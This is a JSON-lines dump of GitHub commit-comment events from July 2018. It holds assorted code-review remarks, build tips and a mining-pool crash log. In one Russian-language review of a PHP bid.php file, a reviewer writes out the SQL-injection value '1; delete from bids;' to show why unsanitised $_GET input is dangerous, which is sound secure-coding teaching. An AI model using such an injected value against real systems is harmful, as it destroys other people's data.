{"id":"7928103815","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619424,"position":21,"line":21,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:21:14Z","updated_at":"2018-07-06T10:21:14Z","author_association":"NONE","body":"if ( z % 3 === 0) {\r\n\r\n}"}},"created_at":"2018-07-06T10:21:14Z"}
{"id":"7928104217","type":"CommitCommentEvent","actor":{"login":"jsynowiec"},"repo":{"name":"drbig/imdbpy"},"payload":{"comment":{"id":29619426,"position":null,"line":null,"path":null,"commit_id":"78db742ff2f4c55e0498797a0eef288dd791d9b3","created_at":"2018-07-06T10:21:19Z","updated_at":"2018-07-06T10:21:19Z","author_association":"NONE","body":"@uyar did you know that you can tag co-authors in the commit message on GitHub (manually or using GitHub Desktop)?\r\n\r\nRead more here: https://github.com/desktop/desktop/pull/3879"}},"created_at":"2018-07-06T10:21:19Z"}
{"id":"7928110817","type":"CommitCommentEvent","actor":{"login":"joye-ramone"},"repo":{"name":"joye-ramone/na-ogsr"},"payload":{"comment":{"id":29619434,"position":3,"line":50,"path":"gamedata/scripts/se_zones.script","commit_id":"f539efd75133355ab94cab32ecdba15131a8ac6f","created_at":"2018-07-06T10:22:45Z","updated_at":"2018-07-06T10:22:45Z","author_association":"OWNER","body":"https://pastebin.com/WWfN0ZYP\r\nТам вроде бы недавно у CSE_ALifeAnomalousZone базовый класс менялся. Может из за этого?\r\nВылетает только для новой игры и то не всегда. Может 1 из 10 раз"}},"created_at":"2018-07-06T10:22:45Z"}
{"id":"7928139415","type":"CommitCommentEvent","actor":{"login":"SHARANGRD"},"repo":{"name":"SHARANGRD/ang-sh-ui"},"payload":{"comment":{"id":29619477,"position":9,"line":9,"path":"product.ts","commit_id":"f99f32a01e39cde80b56dd82f6603c718ea0499e","created_at":"2018-07-06T10:29:25Z","updated_at":"2018-07-06T10:29:25Z","author_association":"OWNER","body":"export interface IProduct {\r\n    productId: number;\r\n    productName: string;\r\n    productCode: string;\r\n    releaseDate: string;\r\n    price: number;\r\n    description: string;\r\n    starRating: number;\r\n    imageUrl: string;\r\n    version:2.0;\r\n}\r\n\r\n"}},"created_at":"2018-07-06T10:29:25Z"}
{"id":"7928146918","type":"CommitCommentEvent","actor":{"login":"rohanand"},"repo":{"name":"rohanand/test-infra"},"payload":{"comment":{"id":29619488,"position":7,"line":47,"path":"prow/plugins/trigger/pr.go","commit_id":"0167ec76f7d7cc3d3a1a55300fca5721fa2facaa","created_at":"2018-07-06T10:31:10Z","updated_at":"2018-07-06T10:31:10Z","author_association":"OWNER","body":"coz if block ends with a return statement, so drop this else and outdent its block"}},"created_at":"2018-07-06T10:31:10Z"}
{"id":"7928151037","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619492,"position":27,"line":1226,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T10:32:09Z","updated_at":"2018-07-06T10:32:09Z","author_association":"NONE","body":"unsigned int"}},"created_at":"2018-07-06T10:32:09Z"}
{"id":"7928155013","type":"CommitCommentEvent","actor":{"login":"obgm"},"repo":{"name":"mrdeep1/libcoap"},"payload":{"comment":{"id":29619500,"position":5,"line":39,"path":"scripts/build.sh","commit_id":"f770d02dad22a9f549057802a6da7958ba20cf0a","created_at":"2018-07-06T10:33:05Z","updated_at":"2018-07-06T10:33:05Z","author_association":"NONE","body":"This should be \r\n\r\n```sh\r\nlibtool --mode=execute valgrind --track-origins=yes --leak-check=yes --error-exitcode=123 --quiet tests/testdriver\r\n```"}},"created_at":"2018-07-06T10:33:05Z"}
{"id":"7928162123","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29619519,"position":5,"line":4734,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/XWiki.java","commit_id":"7d22117d95803b4da1a304d157081d602ac5f51a","created_at":"2018-07-06T10:34:42Z","updated_at":"2018-07-06T10:34:42Z","author_association":"MEMBER","body":"This changes the behavior because ``getCurrentGetDocumentResolver`` uses the ``currentgetdocument`` resolver while ``getDocumentReference`` uses ``current``. For instance, if this method is called for a wiki reference the returned URL is no longer pointing to the wiki home page but to the current page. See 37f3d6f0fa04204354a7dd407ad1efdbb19e1731 ."}},"created_at":"2018-07-06T10:34:42Z"}
{"id":"7928163684","type":"CommitCommentEvent","actor":{"login":"jarvist"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29619523,"position":null,"line":null,"path":null,"commit_id":"854fd8720b3c5a4dc8e6744a8a2239f3d4230595","created_at":"2018-07-06T10:35:05Z","updated_at":"2018-07-06T10:35:05Z","author_association":"OWNER","body":"BTW; there is a wrapped `git mv` command on the commandline which moves things + adds to the git commit trail so that you end up with a lightweight `> file rename A -> B` rather than `deleted A; added these lines to B` history. Essentially you just prepend any `mv` commands with `git`, when working with tracked files.\r\ni.e. \r\n`git mv src/testing_dipole_response.jl test/`"}},"created_at":"2018-07-06T10:35:05Z"}
{"id":"7928164934","type":"CommitCommentEvent","actor":{"login":"gekkeharry13"},"repo":{"name":"elastic/ansible-elasticsearch"},"payload":{"comment":{"id":29619526,"position":null,"line":null,"path":null,"commit_id":"cc28b6149af9866455f9b1b90ac601596e4635a4","created_at":"2018-07-06T10:35:22Z","updated_at":"2018-07-06T10:35:22Z","author_association":"CONTRIBUTOR","body":"Hi @itblaked, I added it while working on a different pull request. I still have SSL support present on my own ansible templates (https://github.com/gekkeharry13/ansible-elasticsearch). Maybe you can use it from there. If there is a pull request I can try to get the code into the main repository."}},"created_at":"2018-07-06T10:35:22Z"}
{"id":"7928165780","type":"CommitCommentEvent","actor":{"login":"caseycs"},"repo":{"name":"htmlacademy-php/106097-yeticave"},"payload":{"comment":{"id":29619528,"position":6,"line":6,"path":"bid.php","commit_id":"144eebbcbf3e19550e9f8012ae295e800e9637a2","created_at":"2018-07-06T10:35:34Z","updated_at":"2018-07-06T10:35:34Z","author_association":"COLLABORATOR","body":"Что мы пытаемся сделать этой проверкой?"}},"created_at":"2018-07-06T10:35:34Z"}
{"id":"7928170850","type":"CommitCommentEvent","actor":{"login":"caseycs"},"repo":{"name":"htmlacademy-php/106097-yeticave"},"payload":{"comment":{"id":29619536,"position":28,"line":28,"path":"bid.php","commit_id":"144eebbcbf3e19550e9f8012ae295e800e9637a2","created_at":"2018-07-06T10:36:42Z","updated_at":"2018-07-06T10:36:42Z","author_association":"COLLABORATOR","body":"Использовать `$_GET['id']` небезопасно - я могу вместо цифры перед в него `1; delete from bids;` и удалить все данные из таблицы"}},"created_at":"2018-07-06T10:36:42Z"}
{"id":"7928172458","type":"CommitCommentEvent","actor":{"login":"nikeshchatur"},"repo":{"name":"nikeshchatur/InsuranceAdvisor"},"payload":{"comment":{"id":29619540,"position":null,"line":null,"path":null,"commit_id":"d5bb2c60d4dd34333268a269dc3560cc2758b0ed","created_at":"2018-07-06T10:37:05Z","updated_at":"2018-07-06T10:37:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/0844d966-682f-436f-b060-7172934baaca?env_id=ibm%3Ayp%3Aeu-gb \"Insurance advisor-toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/9c8d73cd-01dd-47c8-aa40-0f008ab16a9a?env_id=ibm%3Ayp%3Aeu-gb \"InsuranceAdvisor-DeliveryPipeline\") deployed [InsuranceAdvisor](https://github.com/nikeshchatur/InsuranceAdvisor/releases/tag/deploy-ibm-yp-eu-gb-nikeshchaturvedi-yahoo.com-dev-20180706-103704 \"deploy-ibm-yp-eu-gb-nikeshchaturvedi-yahoo.com-dev-20180706-103704\") to [dev](https://console.bluemix.net/apps/240b0093-cd27-41e5-ac04-30ef08ee7ceb?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:nikeshchaturvedi@yahoo.com:dev\"), including this commit"}},"created_at":"2018-07-06T10:37:05Z"}
{"id":"7928174276","type":"CommitCommentEvent","actor":{"login":"gowthamrn4"},"repo":{"name":"gowthamrn4/test"},"payload":{"comment":{"id":29619544,"position":11,"line":11,"path":"services.html","commit_id":"4a5b8ecd1ab01467ae6f084a141716c793ced94e","created_at":"2018-07-06T10:37:32Z","updated_at":"2018-07-06T10:37:32Z","author_association":"OWNER","body":"this is header "}},"created_at":"2018-07-06T10:37:32Z"}
{"id":"7928178730","type":"CommitCommentEvent","actor":{"login":"caseycs"},"repo":{"name":"htmlacademy-php/106097-yeticave"},"payload":{"comment":{"id":29619557,"position":5,"line":40,"path":"lot.php","commit_id":"144eebbcbf3e19550e9f8012ae295e800e9637a2","created_at":"2018-07-06T10:38:38Z","updated_at":"2018-07-06T10:38:38Z","author_association":"COLLABORATOR","body":"Лучше выбрать также колонку `id` в sql запросе на получение данных лота - тогда все данные о нем будут в одном массиве."}},"created_at":"2018-07-06T10:38:38Z"}
{"id":"7928179641","type":"CommitCommentEvent","actor":{"login":"mflorea"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29619561,"position":16,"line":1984,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/XWiki.java","commit_id":"37f3d6f0fa04204354a7dd407ad1efdbb19e1731","created_at":"2018-07-06T10:38:50Z","updated_at":"2018-07-06T10:38:50Z","author_association":"MEMBER","body":"Shouldn't we use ``getCurrentGetDocumentResolver()`` here to be consistent with ``getDocument(EntityReference)``? Otherwise we break the behavior when a wiki reference is passed."}},"created_at":"2018-07-06T10:38:50Z"}
{"id":"7928179866","type":"CommitCommentEvent","actor":{"login":"diego-G"},"repo":{"name":"LiskHQ/sodium-native"},"payload":{"comment":{"id":29619565,"position":null,"line":null,"path":null,"commit_id":"dd0319f679cc5b4821c9c409fa02884a2c80938e","created_at":"2018-07-06T10:38:53Z","updated_at":"2018-07-06T10:38:53Z","author_association":"MEMBER","body":"@shuse2 shall we do the same for `node-gyp-build`? The latest version is `3.4.0` which was being installed till now."}},"created_at":"2018-07-06T10:38:53Z"}
{"id":"7928183089","type":"CommitCommentEvent","actor":{"login":"857487"},"repo":{"name":"globaltoken/node-open-mining-portal"},"payload":{"comment":{"id":29619570,"position":null,"line":null,"path":null,"commit_id":"8730c9946d62745096b3f1feb87c7ddfb2300c7c","created_at":"2018-07-06T10:39:41Z","updated_at":"2018-07-06T10:39:41Z","author_association":"NONE","body":"2018-07-06 18:37:48 [POSIX]\t[Connection Limit] (Safe to ignore) POSIX module not installed and resource (connection) limit was not raised\r\n2018-07-06 18:37:48 [Master]\t[CLI] CLI listening on port 17117\r\n2018-07-06 18:37:49 [Website]\t[Server] Website started on 0.0.0.0:88\r\n(node:28197) DeprecationWarning: (node-watch) First param in callback function  is replaced with event name since 0.5.0, use  `(evt, filename) => {}` if you want to get the filename\r\n2018-07-06 18:37:49 [Switching]\t[Setup] (Thread 1) Loading last proxy state from redis\r\n2018-07-06 18:37:49 [Pool]\t[bitcoinx] (Thread 1) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 18:37:49 [Master]\t[PoolSpawner] Fork 0 died, spawning replacement worker...\r\n2018-07-06 18:37:49 [Website]\t[bitcoinx] Unauthorized RPC access - invalid RPC username or password\r\n2018-07-06 18:37:49 [Switching]\t[Setup] (Thread 2) Loading last proxy state from redis\r\n2018-07-06 18:37:49 [Pool]\t[bitcoinx] (Thread 2) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 18:37:49 [Master]\t[PoolSpawner] Fork 1 died, spawning replacement worker...\r\n2018-07-06 18:37:50 [Switching]\t[Setup] (Thread 3) Loading last proxy state from redis\r\n2018-07-06 18:37:50 [Pool]\t[bitcoinx] (Thread 3) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 18:37:50 [Master]\t[PoolSpawner] Fork 2 died, spawning replacement worker...\r\n2018-07-06 18:37:50 [Switching]\t[Setup] (Thread 4) Loading last proxy state from redis\r\n2018-07-06 18:37:50 [Pool]\t[bitcoinx] (Thread 4) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 18:37:50 [Master]\t[PoolSpawner] Fork 3 died, spawning replacement worker...\r\n2018-07-06 18:37:50 [Switching]\t[Setup] (Thread 5) Loading last proxy state from redis\r\n2018-07-06 18:37:50 [Pool]\t[bitcoinx] (Thread 5) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 18:37:50 [Master]\t[PoolSpawner] Fork 4 died, spawning replacement worker...\r\n2018-07-06 18:37:50 [Switching]\t[Setup] (Thread 6) Loading last proxy state from redis\r\n2018-07-06 18:37:50 [Pool]\t[bitcoinx] (Thread 6) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 18:37:50 [Master]\t[PoolSpawner] Fork 5 died, spawning replacement worker...\r\n2018-07-06 18:37:51 [Switching]\t[Setup] (Thread 7) Loading last proxy state from redis\r\n2018-07-06 18:37:51 [Pool]\t[bitcoinx] (Thread 7) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 18:37:51 [Master]\t[PoolSpawner] Fork 6 died, spawning replacement worker...\r\n^C\r\n"}},"created_at":"2018-07-06T10:39:41Z"}
{"id":"7928183482","type":"CommitCommentEvent","actor":{"login":"caseycs"},"repo":{"name":"htmlacademy-php/106097-yeticave"},"payload":{"comment":{"id":29619572,"position":45,"line":45,"path":"bid.php","commit_id":"144eebbcbf3e19550e9f8012ae295e800e9637a2","created_at":"2018-07-06T10:39:45Z","updated_at":"2018-07-06T10:39:45Z","author_association":"COLLABORATOR","body":"Что содержится в `$id`? Где мы ее используем?"}},"created_at":"2018-07-06T10:39:45Z"}
{"id":"7928184216","type":"CommitCommentEvent","actor":{"login":"adisky"},"repo":{"name":"rohanand/test-infra"},"payload":{"comment":{"id":29619574,"position":null,"line":null,"path":null,"commit_id":"0167ec76f7d7cc3d3a1a55300fca5721fa2facaa","created_at":"2018-07-06T10:39:57Z","updated_at":"2018-07-06T10:39:57Z","author_association":"NONE","body":"I am not sure on this comment changes"}},"created_at":"2018-07-06T10:39:57Z"}
{"id":"7928187312","type":"CommitCommentEvent","actor":{"login":"danielsogl"},"repo":{"name":"acidanthera/AppleALC"},"payload":{"comment":{"id":29619577,"position":5,"line":5,"path":"Changelog.md","commit_id":"7ba397832fed6fbc21047dcf2573a5eaa09045d0","created_at":"2018-07-06T10:40:34Z","updated_at":"2018-07-06T10:40:34Z","author_association":"NONE","body":"Are you sure? Because there is no 1.2.4 or greater."}},"created_at":"2018-07-06T10:40:34Z"}
{"id":"7928190664","type":"CommitCommentEvent","actor":{"login":"xiexed"},"repo":{"name":"NikitaKatkov/intellij-community"},"payload":{"comment":{"id":29619582,"position":1,"line":1,"path":".idea/misc.xml","commit_id":"c78539286707c0ce561d4f715ced22ad5bd3b3ba","created_at":"2018-07-06T10:41:18Z","updated_at":"2018-07-06T10:41:18Z","author_association":"NONE","body":"Не надо коммитить файлы из настроек идеи"}},"created_at":"2018-07-06T10:41:18Z"}
{"id":"7928199151","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29619601,"position":4,"line":552,"path":"mandelbulber2/src/fractal_list.cpp","commit_id":"34d2e48564e85644e66309e08308c0ff42e367ec","created_at":"2018-07-06T10:43:11Z","updated_at":"2018-07-06T10:43:11Z","author_association":"OWNER","body":"@mclarekin, What was the reason of this change? Now this transform will use only DeltaDE with other IFS formulas (very inefficient)\r\nEven when was analyticFunctionIFS there was used DeltaDE when it was in hybrid with Mandelbulb formulas. \r\n"}},"created_at":"2018-07-06T10:43:11Z"}
{"id":"7928201752","type":"CommitCommentEvent","actor":{"login":"danielsogl"},"repo":{"name":"acidanthera/AppleALC"},"payload":{"comment":{"id":29619606,"position":5,"line":5,"path":"Changelog.md","commit_id":"7ba397832fed6fbc21047dcf2573a5eaa09045d0","created_at":"2018-07-06T10:43:47Z","updated_at":"2018-07-06T10:43:47Z","author_association":"NONE","body":"Did you mean AppleALC? Because Lilu has no version 1.2.4 or greater at this moment."}},"created_at":"2018-07-06T10:43:47Z"}
{"id":"7928202980","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18002/programming-term2"},"payload":{"comment":{"id":29619608,"position":null,"line":null,"path":null,"commit_id":"88dddf873b7c77780e0f5462a10ddecad2089e2f","created_at":"2018-07-06T10:44:05Z","updated_at":"2018-07-06T10:44:05Z","author_association":"NONE","body":"計算結果的にはOKです。提出期限にも間に合ってますのでひとまずOKです。\r\nただ、出題内容として、登場する値を変数にしたくださいと指示したので、\r\n折角最初に用意したのに消したtori_nやtori_k、rateを削除してしまったのが残念です。\r\n\r\nまた、おつまみの個数を折角用意しているのに計算に使っていないのが勿体無いです。\r\nこれだと個数を1個から2個に変更したい場合に、tumami_kの値を2に変更しても\r\n計算結果に反映されませんよね。\r\n\r\n以上を踏まえると、下記のように修正したほうがいいです。\r\n(修正箇所だけ抜粋して記載します。\r\n #以降は僕のコメントです。コードには入れなくて構いません)\r\n\r\ntori_n = 100 # 削除したコードを復活\r\ntori_k = 2 # 削除したコードを復活\r\nrate = 0.2 # 「割引率」として変数に代入\r\nyakitori = (tori_n * (1 - rate)) * tori_k # 1個あたり、単価より2割引をまず最初にカッコの中で計算、それに2個掛ける\r\n\r\nkaikei = (sake_n * sake_k) + (tumami_n * tumami_k) + yakitori - point # 式中で掛け算や割り算しない箇所は基本的にカッコは不要\r\n\r\n以上、ご確認お願いします。\r\n時間があれば修正して実行してみてくださいね。"}},"created_at":"2018-07-06T10:44:05Z"}
{"id":"7928211894","type":"CommitCommentEvent","actor":{"login":"Sjors"},"repo":{"name":"TheCharlatan/bitcoin"},"payload":{"comment":{"id":29619629,"position":4,"line":8,"path":"depends/packages/packages.mk","commit_id":"0c7307e8bdd76ec93fdd7ab0fb901dc65fb06121","created_at":"2018-07-06T10:46:11Z","updated_at":"2018-07-06T10:46:11Z","author_association":"NONE","body":"What does the extra `$(qt_packages)` do?"}},"created_at":"2018-07-06T10:46:11Z"}
{"id":"7928213009","type":"CommitCommentEvent","actor":{"login":"diegoballen"},"repo":{"name":"diegoballen/MyRepositoryTest1"},"payload":{"comment":{"id":29619632,"position":null,"line":null,"path":null,"commit_id":"6acb94ab1e20949c5abbc128f0060821226b6672","created_at":"2018-07-06T10:46:24Z","updated_at":"2018-07-06T10:46:24Z","author_association":"OWNER","body":"Try to return 1"}},"created_at":"2018-07-06T10:46:24Z"}
{"id":"7928214190","type":"CommitCommentEvent","actor":{"login":"rohanand"},"repo":{"name":"rohanand/test-infra"},"payload":{"comment":{"id":29619636,"position":6,"line":59,"path":"prow/plugins/plugins.go","commit_id":"0167ec76f7d7cc3d3a1a55300fca5721fa2facaa","created_at":"2018-07-06T10:46:40Z","updated_at":"2018-07-06T10:46:40Z","author_association":"OWNER","body":"Actually i have not made changes in it. It is already present from master branch."}},"created_at":"2018-07-06T10:46:40Z"}
{"id":"7928221346","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29619649,"position":null,"line":null,"path":null,"commit_id":"2744de6c0927799ab1bda5c0414f2ce60a5ded54","created_at":"2018-07-06T10:48:23Z","updated_at":"2018-07-06T10:48:23Z","author_association":"OWNER","body":"thanks. Yes, was a good test to try and verify the idea behind it.. but seemingly not needed indeed."}},"created_at":"2018-07-06T10:48:23Z"}
{"id":"7928226183","type":"CommitCommentEvent","actor":{"login":"sarah27h"},"repo":{"name":"sarah27h/FEND-restaurant-stage-1"},"payload":{"comment":{"id":29619658,"position":null,"line":null,"path":null,"commit_id":"7ee2ef0656f796134544b5ebeb9fa7f98383d469","created_at":"2018-07-06T10:49:32Z","updated_at":"2018-07-06T10:49:32Z","author_association":"OWNER","body":"When I use **<a href=\"/\">** give me error and **<a href=\"./\">** works fine"}},"created_at":"2018-07-06T10:49:32Z"}
{"id":"7928228178","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29619661,"position":null,"line":null,"path":null,"commit_id":"79f7da1d5ed43e1a9e9416a503d7b29f3b8fdd38","created_at":"2018-07-06T10:49:59Z","updated_at":"2018-07-06T10:49:59Z","author_association":"NONE","body":"[R/datadocs.R:147:1:](https://github.com/jackwasey/icd/blob/79f7da1d5ed43e1a9e9416a503d7b29f3b8fdd38/R/datadocs.R#L147) *style:* **Lines should not be more than 120 characters.**\n```r\n​#'   \\url{https://www.cms.gov/Research-Statistics-Data-and-Systems/Statistics-Trends-and-Reports/Reports/Downloads/Pope_2000_2.pdf}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-06T10:49:59Z"}
{"id":"7928231937","type":"CommitCommentEvent","actor":{"login":"AryanPatidar"},"repo":{"name":"AryanPatidar/Xtended_device_xiaomi_riva"},"payload":{"comment":{"id":29619668,"position":null,"line":null,"path":null,"commit_id":"06d13f6af4200cfee36c2efde2fa5bf3e27004c6","created_at":"2018-07-06T10:50:52Z","updated_at":"2018-07-06T10:50:52Z","author_association":"OWNER","body":"Updated Boot animation Target Size"}},"created_at":"2018-07-06T10:50:52Z"}
